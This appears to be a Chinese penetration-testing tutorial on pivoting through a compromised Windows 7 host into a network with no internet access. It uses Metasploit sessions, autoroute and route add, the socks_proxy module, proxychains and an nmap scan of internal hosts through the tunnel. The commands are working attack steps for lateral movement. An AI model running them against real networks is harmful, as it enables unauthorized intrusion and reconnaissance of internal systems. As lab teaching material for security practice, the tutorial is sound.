目录
如下拓扑图,win7可以访问互联网,而win2016不能访问互联网。这里我们将win7的shell弹到公网vps的msf上。因为win2016不出网,我们如何在msf上使用其他工具访问win2016了
win7的shell如下
查看当前的网段信息
sessions -i 1
shell
ipconfig
我们可以看到有两个网段,下面对10这个网段进行探测
添加路由
在使用msf探测各网段主机信息时,我们需要先添加通往各网段的路由,这样msf才知道怎么走。我们可以添加自动路由,或者指定路由添加,我们先进入meterpreter的shell
run post/multi/manage/autoroute
#查看路由信息
run autoroute -p
#添加指定路由,1是接收的session编号
msf6 > route add 192.168.10.0 255.255.255.0 1
然后我们输入 background 暂时退出shell,此时输入如下也可以查看路由表信息
route
这样我们在msf中,用msf自带的模块对内网的主机进行扫描探测,msf会自动将流量送往对应的网段
这里其实有一个大问题,通过这种方式做代理转发,只能是msf使用,其它应用无法使用,如果想使用其他应用探测内网如nmap等工具?当然也有办法,就是再加一个socks代理即可。
添加socks代理
1. 添加socks代理
这里其实就是在我们的vps开启了一个socks代理,监听vps本地的1080端口,然后再通过这个端口将流量转给msf,msf又添加了路由,所以能将流量直接带入到内网中。假设我们需要在vps中使用其他工具探测内网
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1 #或者默认0.0.0.0
run
2. 编辑proxychains
vim /etc/proxychains.conf
proxychains4 命令
访问内网主机的web服务
ps:proxychains只对tcp流量有效,所以udp和icmp都是不能代理转发的。
使用namp进行扫描,nmap通过socks代理进行扫描,必须加上 -sT、-Pn两个参数
msf6 auxiliary(server/socks_proxy) > proxychains4 nmap 192.168.10.2 -sT -Pn -p80,445,135
# -sT 全开扫描,完成三次握手
# -Pn 不使用ping扫描
3. 那假如我们要在我们自己的电脑上访问内网了,我们可以将代理服务器的ip设置为vps公网的ip
然后浏览器设置socks5代理
这样就能直接访问到内网的web服务